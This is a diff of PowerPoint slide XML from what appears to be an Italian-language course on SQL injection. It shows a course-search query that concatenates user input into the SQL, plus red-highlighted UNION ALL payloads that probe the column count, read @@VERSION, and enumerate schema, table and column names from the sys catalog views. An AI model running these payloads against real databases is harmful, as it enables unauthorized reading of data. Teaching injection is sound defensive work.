+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3888C5D-BAF9-437A-AFEC-0534699BC1AC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>SQL Injection #2: UNION ALL</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F29C4C6-2E4B-5C23-FB9C-35592599654F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3EA41C-F190-75C0-9BF2-EDD19899950A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' </a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UNION ALL </a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT NULL, 'a', NULL, NULL, NULL, NULL</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>ORDER BY 2</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3172376356"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -11931,23 +12824,19 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> la </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>versione</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t> del database server*</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -12127,11 +13016,16 @@
               </a:rPr>
               <a:t>}</a:t>
             </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> AND Title LIKE '%</a:t>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -12140,74 +13034,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>’</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UNION ALL</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	SELECT NULL, @@VERSION, NULL, NULL, NULL, NULL</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>ORDER BY 2--</a:t>
+              <a:t>' UNION ALL SELECT NULL, @@VERSION, NULL, NULL, NULL, NULL ORDER BY 2--</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -12225,435 +13052,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1910861544"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 127">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF40531-5418-D238-DA56-5FBD9EE743E3}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="128" name="Google Shape;128;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67786EA0-FB50-F4E4-40B4-ED11F90D9FBF}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1290150" y="1454970"/>
-            <a:ext cx="6563700" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr lvl="0" algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="129" name="Google Shape;129;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85D4787-33B1-E75D-99CB-1D54A1200C5E}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="130" name="Google Shape;130;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A16D06-AE54-6BF4-ADE9-45C93D634A35}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1441500" y="2123627"/>
-            <a:ext cx="6261000" cy="2292051"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="127000" lvl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>SELECT</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	Id, Title, StartDate, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>EndDate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>, Result, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>dbo.Courses</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>{</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="accent5">
-                    <a:lumMod val="60000"/>
-                    <a:lumOff val="40000"/>
-                  </a:schemeClr>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>userId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	AND Title LIKE '%</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>' UNION ALL SELECT NULL, CONCAT(S.name, '.', T.name, '.', C.name), NULL, NULL, NULL, NULL FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>sys.columns</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> C INNER JOIN </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>sys.tables</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> T ON </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>T.object_id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>C.object_id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> INNER JOIN </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>sys.schemas</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> S ON </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>S.schema_id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
